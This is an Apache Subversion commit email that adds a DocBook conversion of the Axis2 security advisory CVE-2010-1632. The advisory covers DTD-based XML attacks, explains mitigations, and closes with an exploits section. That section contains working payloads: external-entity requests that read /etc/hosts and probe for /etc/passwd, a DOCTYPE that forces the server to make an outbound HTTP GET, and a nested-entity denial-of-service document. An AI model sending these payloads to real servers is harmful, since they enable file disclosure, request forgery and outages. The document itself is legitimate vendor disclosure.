Author: veithen
Date: Sun Jun 27 07:51:38 2010
New Revision: 958346
URL: http://svn.apache.org/viewvc?rev=958346&view=rev
Log:
CVE-2010-1632: Converted the advisory document to Docbook (instead of MS Word).
Added:
axis/axis2/java/core/security/advisory-cve-2010-1632/ (with props)
axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml (with props)
axis/axis2/java/core/security/advisory-cve-2010-1632/src/
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
(with props)
Removed:
axis/axis2/java/core/security/CVE-2010-1632.docx
Propchange: axis/axis2/java/core/security/advisory-cve-2010-1632/
------------------------------------------------------------------------------
--- svn:ignore (added)
+++ svn:ignore Sun Jun 27 07:51:38 2010
@@ -0,0 +1 @@
+target
Added: axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml
URL:
http://svn.apache.org/viewvc/axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml?rev=958346&view=auto
==============================================================================
--- axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml (added)
+++ axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml Sun Jun 27
07:51:38 2010
@@ -0,0 +1,62 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!--
+ ~ Licensed to the Apache Software Foundation (ASF) under one
+ ~ or more contributor license agreements. See the NOTICE file
+ ~ distributed with this work for additional information
+ ~ regarding copyright ownership. The ASF licenses this file
+ ~ to you under the Apache License, Version 2.0 (the
+ ~ "License"); you may not use this file except in compliance
+ ~ with the License. You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing,
+ ~ software distributed under the License is distributed on an
+ ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ ~ KIND, either express or implied. See the License for the
+ ~ specific language governing permissions and limitations
+ ~ under the License.
+ -->
+<project xmlns="http://maven.apache.org/POM/4.0.0";
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";
+ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/maven-v4_0_0.xsd";>
+ <modelVersion>4.0.0</modelVersion>
+ <parent>
+ <groupId>org.apache</groupId>
+ <artifactId>apache</artifactId>
+ <version>7</version>
+ </parent>
+ <groupId>org.apache.axis2</groupId>
+ <artifactId>advisory-cve-2010-1632</artifactId>
+ <version>1</version>
+ <name>Axis2 Security Advisory CVE-2010-1632</name>
+ <packaging>pom</packaging>
+ <build>
+ <plugins>
+ <plugin>
+ <groupId>com.agilejava.docbkx</groupId>
+ <artifactId>docbkx-maven-plugin</artifactId>
+ <version>2.0.10</version>
+ <executions>
+ <execution>
+ <goals>
+ <goal>generate-pdf</goal>
+ </goals>
+ <phase>compile</phase>
+ <configuration>
+ <includes>CVE-2010-1632.xml</includes>
+ <sectionAutolabel>1</sectionAutolabel>
+ </configuration>
+ </execution>
+ </executions>
+ <dependencies>
+ <dependency>
+ <groupId>org.docbook</groupId>
+ <artifactId>docbook-xml</artifactId>
+ <version>4.4</version>
+ <scope>runtime</scope>
+ </dependency>
+ </dependencies>
+ </plugin>
+ </plugins>
+ </build>
+</project>
\ No newline at end of file
Propchange: axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml
------------------------------------------------------------------------------
svn:eol-style = native
Added:
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
URL:
http://svn.apache.org/viewvc/axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml?rev=958346&view=auto
==============================================================================
---
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
(added)
+++
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
Sun Jun 27 07:51:38 2010
@@ -0,0 +1,479 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE article PUBLIC "-//OASIS//DTD DocBook XML V4.4//EN"
"http://www.oasis-open.org/docbook/xml/4.4/docbookx.dtd";>
+<!--
+ ~ Licensed to the Apache Software Foundation (ASF) under one
+ ~ or more contributor license agreements. See the NOTICE file
+ ~ distributed with this work for additional information
+ ~ regarding copyright ownership. The ASF licenses this file
+ ~ to you under the Apache License, Version 2.0 (the
+ ~ "License"); you may not use this file except in compliance
+ ~ with the License. You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing,
+ ~ software distributed under the License is distributed on an
+ ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ ~ KIND, either express or implied. See the License for the
+ ~ specific language governing permissions and limitations
+ ~ under the License.
+ -->
+<article>
+ <articleinfo>
+ <title>Apache Axis2 Security Advisory (CVE-2010-1632)</title>
+ <subtitle>HTTP binding (REST) enables DTD based XML attacks</subtitle>
+ <author>
+ <firstname>Andreas</firstname>
+ <surname>Veithen</surname>
+ <email>[email protected]</email>
+ </author>
+ <releaseinfo>First version: May 16, 2010 ⢠First published: June 13,
2010 ⢠Last updated: June 13, 2010</releaseinfo>
+ </articleinfo>
+ <section>
+ <title>Description</title>
+ <para>
+ According to the SOAP 1.1 specification, <quote>A SOAP message
MUST NOT contain a
+ Document Type Declaration.</quote> In Axis2, this constraint is
enforced by the
+ <classname>StAXSOAPModelBuilder</classname> class, which is part
of Axiom. This
+ approach presents two issues:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ It only works for SOAP bindings. HTTP bindings supporting
plain XML messages
+ still allow document type declarations in request messages.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ When processing a document with a document type
declaration,
+ <classname>StAXSOAPModelBuilder</classname> only reports
an error after
+ receiving the DTD event from the StAX parser. However, at
this point,
+ the StAX parser may already have processed (part of) the
document type declaration.
+ </para>
+ </listitem>
+ </itemizedlist>
+ <para>
+ This implies that Axis2 is vulnerable to DTD based XML attacks.
There are two types of such attacks:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ Document type declarations may reference other documents,
namely a DTD or
+ external entities declared in the internal subset. If the
XML parser is
+ configured with a default entity resolver (which is the
case for Axis2), this
+ allows an attacker to instruct the parser to access
arbitrary files. Since URLs
+ may be used as system IDs, this includes remote resources
accessible only in the
+ network where the server is deployed. An attacker may
exploit this in several ways:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ By inspecting the error message in the service
response, he may be able to
+ scan for the presence of certain files on the
local file system of the server
+ or for the availability of certain network
resources accessible to the server.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ By including an internal subset in the document
type declaration of the
+ request and using external entity declarations, he
may be able to include
+ the content of arbitrary files (local to the
server) in the request.
+ There are many services that produce responses
that include information
+ from the request message (either as part of a
normal response or a SOAP fault).
+ By carefully crafting the request, the attacker
may thus be able to retrieve
+ the content of arbitrary files from the server.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ Using URLs with the âhttpâ scheme, the
attacker may use the vulnerability
+ to let the server execute arbitrary HTTP GET
requests and attack other
+ systems that have some form of trust relationship
with the Axis2 server.
+ </para>
+ </listitem>
+ </itemizedlist>
+ </listitem>
+ <listitem>
+ <para>
+ While XML does not allow recursive entity definitions, it
does permit nested
+ entity definitions. If a document has very deeply nested
entity definitions,
+ parsing that document can result in very high CPU and
memory consumption during
+ entity expansion. This produces the potential for Denial
of Service attacks.
+ </para>
+ </listitem>
+ </itemizedlist>
+ </section>
+ <section>
+ <title>Systems affected</title>
+ <section id="axis2-affected">
+ <title>Axis2 deployments</title>
+ <para>
+ As shown in <xref linkend="solutions"/>, all Axis2
installations with versions
+ prior to 1.6 are to some extend vulnerable. The most
vulnerable installations
+ are those on which at least one service is deployed that has
an HTTP binding
+ accepting messages with content type
<literal>application/xml</literal>, i.e.
+ for which the <literal>disableREST</literal> parameter is set
to <literal>false</literal>.
+ Note that this is the default setting.
+ </para>
+ <para>
+ Even deployments with REST disabled are partially vulnerable
(see
+ <xref linkend="exploit-url-access"/> and <xref
linkend="exploit-dos"/>).
+ In addition, Axis2 deployments that use a StAX implementation
other
+ than Woodstox may have additional vulnerabilities also
affecting SOAP
+ requests<footnote><para>Woodstox parses the document type
declaration lazily,
+ i.e. only when the DTD event is consumed. In this case, the
protection in
+ <classname>StAXSOAPModelBuilder</classname> is
enough.</para></footnote>.
+ </para>
+ <para>
+ Note that all types of Axis2 deployments are affected by these
vulnerabilities.
+ This includes standalone deployments, deployments using the
WAR distribution
+ as well as Web applications embedding Axis2.
+ </para>
+ </section>
+ <section>
+ <title>Other products</title>
+ <para>
+ Axis2 is used in (or as the basis for) other products. This
includes the Synapse,
+ ODE, Tuscany and Geronimo projects from the ASF, as well as
several commercial
+ products. It is likely that these products are vulnerable as
well.
+ </para>
+ <para>
+ It is possible that Web service frameworks other than Axis2
are affected by
+ similar vulnerabilities.
+ </para>
+ <para>
+ The exploits described in <xref linkend="exploits"/> may be
used to check
+ whether a given product is vulnerable.
+ </para>
+ </section>
+ </section>
+ <section>
+ <title>Impact assessment</title>
+ <para>
+ The vulnerability described in this advisory may allow an attacker
to read
+ arbitrary files on the file system of the node where Axis2 runs,
provided that
+ the account running the Axis2 instance has access to these files
and that
+ Java 2 security is not used to prevent file system access. An
attacker may
+ also be able to retrieve unsecured resources from the network if
they are
+ reachable from the Axis2 instance with URLs that are recognized by
the Java
+ runtime. However, to do so, the attacker needs to create a
specially crafted
+ request that requires knowledge about the services deployed on the
Axis2
+ instance. Therefore, this vulnerability cannot be exploited in an
automated way.
+ </para>
+ <para>
+ The vulnerability may also allow the attacker to check the file
system of the
+ server (resp. network resources reachable by the server) for the
existence
+ of certain files (resp. resources), as well as to carry out Denial
of Service
+ attacks. These attacks donât require knowledge about the
services deployed
+ on Axis2 and may thus be exploited using scripting.
+ </para>
+ <para>
+ It is important that all users of Axis2 (and derived products) who
have
+ deployments that accept XML messages from untrusted sources take
appropriate
+ actions to mitigate the risk caused by the vulnerability described
in this
+ advisory. This also applies to users who have secured their
installations
+ using WS-Security (Rampart).
+ </para>
+ </section>
+ <section id="solutions">
+ <title>Solutions</title>
+ <para>
+ In order to avoid the vulnerability described in this advisory,
apply one of
+ the solutions explained in the following sections.
+ </para>
+ <section>
+ <title>Upgrade to Axis2 1.5.2 or 1.6</title>
+ <para>
+ The security issue described in this advisory is fixed in
Axis2 1.5.2 and 1.6.
+ These releases forbid document type declarations even for
+ <literal>application/xml</literal> documents. Therefore
upgrading to one of
+ these versions is the best solution. Note that at the date of
writing,
+ neither Axis2 1.5.2 nor Axis2 1.6 has been released yet.
However,
+ snapshot versions are available.
+ </para>
+ </section>
+ <section id="solution-disable-application-xml">
+ <title>Disable support for the application/xml content type</title>
+ <para>
+ This solution only applies to users who donât need REST
support.
+ </para>
+ <para>
+ As explained in <xref linkend="axis2-affected"/>, disabling
REST
+ support (using the <literal>disableREST</literal> parameter)
partially
+ solves the issue, but still leaves the system vulnerable to
some types
+ of attacks. Since the issue is caused by the component
responsible for
+ processing messages with content type
<literal>application/xml</literal>,
+ the only effective solution is to disable this component. It is
+ configured in <filename>axis2.xml</filename> using the
following declaration:
+ </para>
+<programlisting><![CDATA[<messageBuilder contentType="application/xml"
+
class="org.apache.axis2.builder.ApplicationXMLBuilder"/>]]></programlisting>
+ <para>
+ However, it is <emphasis role="strong">not</emphasis>
sufficient to just remove
+ this declaration. The reason is that Axis2 registers
+ <classname>ApplicationXMLBuilder</classname> by default, even
if there is
+ no explicit declaration for it in
<filename>axis2.xml</filename>. Therefore
+ the only way to disable this component is to override the
mapping for the
+ <literal>application/xml</literal> content type with a message
builder
+ that doesnât have the same vulnerability. The recommended
way is to
+ replace <classname>ApplicationXMLBuilder</classname> by
<classname>SOAPBuilder</classname>:
+ </para>
+<programlisting><messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.<emphasis
role="strong">SOAPBuilder</emphasis>"/></programlisting>
+ <para>
+ The effect of this is that messages with content type
<literal>application/xml</literal>
+ are no longer processed as plain XML messages, but as SOAP
messages.
+ </para>
+ <para>
+ In addition to this configuration change, it is also necessary
to make sure that
+ Axis2 uses Woodstox as its StAX implementation. This is the
case if
+ <filename>wstx-asl-x.y.z.jar</filename> is in the classpath.
+ </para>
+ </section>
+ <section>
+ <title>Apply a security fix</title>
+ <para>
+ A fix for the issue described in this advisory is available in
source code form from the following location:
+ </para>
+ <para>
+ <ulink
url="https://svn.apache.org/repos/asf/axis/axis2/java/core/security/secfix-cve-2010-1632"/>
+ </para>
+ <para>
+ It has been successfully tested with Axis2 1.4.1 and 1.5.1. In
order to apply the fix,
+ execute the following steps:
+ </para>
+ <procedure>
+ <step>
+ <para>
+ Check out the project from Subversion:
+ </para>
+ <screen>svn co
https://svn.apache.org/repos/asf/axis/axis2/java/core/
+security/secfix-cve-2010-1632</screen>
+ </step>
+ <step>
+ <para>
+ Change into the
<filename>secfix-cve-2010-1632</filename> directory and
+ build the project using <ulink
url="http://maven.apache.org/";>Maven</ulink>:
+ </para>
+ <screen>mvn package</screen>
+ </step>
+ <step>
+ <para>
+ Copy the JAR from the <filename>target</filename>
folder and add it to
+ the Axis2 classpath. For the standalone distribution,
this means adding
+ the JAR to the <filename>lib</filename> folder. For
WAR deployments,
+ add it to <filename>WEB-INF/lib</filename>.
+ </para>
+ </step>
+ <step>
+ <para>
+ Open the <filename>axis2.xml</filename> configuration
file and locate the
+ following entry:
+ </para>
+<programlisting><![CDATA[<messageBuilder contentType="application/xml"
+
class="org.apache.axis2.builder.ApplicationXMLBuilder"/>]]></programlisting>
+ <para>
+ Replace <classname>ApplicationXMLBuilder</classname> by
+ <classname>SecureApplicationXMLBuilder</classname>, as
shown below:
+ </para>
+<programlisting><messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.<emphasis
role="strong">SecureApplicationXMLBuilder</emphasis>"/></programlisting>
+ <para>
+ Note that in the default
<filename>axis2.xml</filename> configuration
+ file shipped with Axis2 1.4.1, the <sgmltag
class="element">messageBuilder</sgmltag>
+ entry for <classname>ApplicationXMLBuilder</classname>
is duplicated.
+ The second entry must be removed in order for the
change to take effect.
+ </para>
+ </step>
+ </procedure>
+ <para>
+ As with the solution described in <xref
linkend="solution-disable-application-xml"/>,
+ also check that Woodstox is present in the classpath.
+ </para>
+ </section>
+ </section>
+ <section id="exploits">
+ <title>Exploits</title>
+ <section>
+ <title>Remote file access</title>
+ <para>
+ The vulnerability can be demonstrated using a stock Axis2
1.5.1 distribution into which the
+ SimpleStockQuoteService from the Apache Synapse project has
been
+ deployed<footnote><para><ulink
url="http://svn.apache.org/repos/asf/synapse/trunk/java/modules/samples/services/SimpleStockQuoteService/"/></para></footnote>.
+ The request that exposes the vulnerability is as follows:
+ </para>
+<programlisting><![CDATA[<!DOCTYPE getQuote [
+ <!ENTITY file SYSTEM "/etc/hosts">
+]>
+<getQuote xmlns="http://services.samples";>
+ <request>
+ <symbol xmlns="http://services.samples/xsd";>&file;</symbol>
+ </request>
+</getQuote>]]></programlisting>
+ <para>
+ Sending this request to the SimpleStockQuoteService
+
endpoint<footnote><para>http://localhost:8080/axis2/services/SimpleStockQuoteService</para></footnote>
+ using <literal>application/xml</literal> as content type gives
the following response:
+ </para>
+<programlisting><![CDATA[<ns:getQuoteResponse
xmlns:ns="http://services.samples";>
+ <ns:return xsi:type="ax21:GetQuoteResponse"
+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";
+ xmlns:ax21="http://services.samples/xsd";>
+ <ax21:change>3.9659262974249048</ax21:change>
+ <ax21:earnings>12.755839004148722</ax21:earnings>
+ <ax21:high>-157.5738168969912</ax21:high>
+ <ax21:last>157.71363587000337</ax21:last>
+ <ax21:lastTradeTimestamp>
+ Sun May 16 14:25:19 CEST 2010
+ </ax21:lastTradeTimestamp>
+ <ax21:low>164.30154930689852</ax21:low>
+ <ax21:marketCap>-4192110.249723876</ax21:marketCap>
+ <ax21:name>##
+# Host Database
+#
+# localhost is used to configure the loopback interface
+# when the system is booting. Do not change this entry.
+##
+127.0.0.1 localhost
+255.255.255.255 broadcasthost
+::1 localhost
+fe80::1%lo0 localhost
+ Company</ax21:name>
+ <ax21:open>-154.31609570318096</ax21:open>
+ <ax21:peRatio>23.935652759459877</ax21:peRatio>
+ <ax21:percentageChange>2.204736746512539</ax21:percentageChange>
+ <ax21:prevClose>179.88207905992505</ax21:prevClose>
+ <ax21:symbol>##
+# Host Database
+#
+# localhost is used to configure the loopback interface
+# when the system is booting. Do not change this entry.
+##
+127.0.0.1 localhost
+255.255.255.255 broadcasthost
+::1 localhost
+fe80::1%lo0 localhost</ax21:symbol>
+ <ax21:volume>7235</ax21:volume>
+ </ns:return>
+</ns:getQuoteResponse>]]></programlisting>
+ <para>
+ As can be seen, the response includes the full content of the
+ <filename>/etc/hosts</filename> file. While this leverages a
particular
+ feature of the SimpleStockQuoteService, it is expected that a
similar
+ attack can be performed with many real world services.
+ </para>
+ <para>
+ It should also be noted that this attack only works if the
+ <literal>disableREST</literal> parameter (see
<filename>axis2.xml</filename>)
+ is set to <literal>false</literal>. If REST is disabled, the
attack is no
+ longer possible and the response from the service will be as
follows:
+ </para>
+ <programlisting><![CDATA[<faultstring>Http binding is disabled for
this service.</faultstring>]]></programlisting>
+ </section>
+ <section id="exploit-url-access">
+ <title>Server file system scan and arbitrary HTTP GET request
execution</title>
+ <para>
+ Even when REST is disabled, the vulnerability can still be
exploited to
+ check the existence of a particular file on the server file
system.
+ Consider the following request (again with content type
<literal>application/xml</literal>):
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root SYSTEM "/etc/passwd">
+<root/>]]></programlisting>
+ <para>
+ When sent to any valid endpoint, this triggers the following
response, assuming that
+ Axis2 is installed on a Unix system:
+ </para>
+<programlisting><![CDATA[<faultstring>[com.ctc.wstx.exc.WstxLazyException]
+Unexpected character '#' (code 35) in external DTD subset;
+expected a '<' to start a directive
+ at [row,col,system-id]: [1,1,"file:/etc/passwd"]
+ from [row,col {unknown-source}]: [1,1]</faultstring>]]></programlisting>
+ <para>
+ On a non Unix system or if the DOCTYPE declaration refers to a
non existing
+ file, the response will be different:
+ </para>
+<programlisting><![CDATA[<faultstring>[com.ctc.wstx.exc.WstxLazyException]
+(was java.io.FileNotFoundException) /non_existing_file
+(No such file or directory)
+ at [row,col {unknown-source}]: [1,43]</faultstring>]]></programlisting>
+ <para>
+ By inspecting the response, an attacker can easily determine
whether or not
+ a given file exists on the file system of the server.
+ </para>
+ <para>
+ The same technique can also be used to trick Axis2 into
executing
+ arbitrary HTTP GET requests (including query parameters):
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root SYSTEM
"http://www.google.com/search?q=test";>
+<root/>]]></programlisting>
+ </section>
+ <section id="exploit-dos">
+ <title>Denial of Service</title>
+ <para>
+ A Denial of Service attack using deeply nested entity
definitions can
+ easily be demonstrated using the following request:
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root [
+ <!ENTITY x32 "foobar">
+ <!ENTITY x31 "&x32;&x32;">
+ <!ENTITY x30 "&x31;&x31;">
+ <!ENTITY x29 "&x30;&x30;">
+ <!ENTITY x28 "&x29;&x29;">
+ <!ENTITY x27 "&x28;&x28;">
+ <!ENTITY x26 "&x27;&x27;">
+ <!ENTITY x25 "&x26;&x26;">
+ <!ENTITY x24 "&x25;&x25;">
+ <!ENTITY x23 "&x24;&x24;">
+ <!ENTITY x22 "&x23;&x23;">
+ <!ENTITY x21 "&x22;&x22;">
+ <!ENTITY x20 "&x21;&x21;">
+ <!ENTITY x19 "&x20;&x20;">
+ <!ENTITY x18 "&x19;&x19;">
+ <!ENTITY x17 "&x18;&x18;">
+ <!ENTITY x16 "&x17;&x17;">
+ <!ENTITY x15 "&x16;&x16;">
+ <!ENTITY x14 "&x15;&x15;">
+ <!ENTITY x13 "&x14;&x14;">
+ <!ENTITY x12 "&x13;&x13;">
+ <!ENTITY x11 "&x12;&x12;">
+ <!ENTITY x10 "&x11;&x11;">
+ <!ENTITY x9 "&x10;&x10;">
+ <!ENTITY x8 "&x9;&x9;">
+ <!ENTITY x7 "&x8;&x8;">
+ <!ENTITY x6 "&x7;&x7;">
+ <!ENTITY x5 "&x6;&x6;">
+ <!ENTITY x4 "&x5;&x5;">
+ <!ENTITY x3 "&x4;&x4;">
+ <!ENTITY x2 "&x3;&x3;">
+ <!ENTITY x1 "&x2;&x2;">
+]>
+<root attr="&x1;"/>]]></programlisting>
+ <para>
+ When sent with content type <literal>application/xml</literal>
to any
+ valid endpoint, this request will cause an out of memory
condition
+ on the server. This works even if REST is disabled. The reason
is that
+ before checking if the request is acceptable, Axis2 needs to
parse
+ the start tag of the document element. The expansion of the
entity
+ used in the attribute on this element will then cause an out
of memory error.
+ </para>
+ </section>
+ </section>
+ <section>
+ <title>References</title>
+ <para>
+ The issue that causes the vulnerability exposed in the present
advisory was
+ initially described in JIRA report
+ AXIS2-4450<footnote><para><ulink
url="https://issues.apache.org/jira/browse/AXIS2-4450"/></para></footnote>.
+ </para>
+ </section>
+ <section>
+ <title>Contact</title>
+ <para>
+ Please send all security relevant comments (e.g. about additional
+ vulnerabilities not identified by this advisory) to
<email>[email protected]</email>.
+ Questions and comments that are not security relevant may be sent
to
+ the public <email>[email protected]</email> mailing list.
+ </para>
+ </section>
+</article>
\ No newline at end of file
Propchange:
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
------------------------------------------------------------------------------
svn:eol-style = native
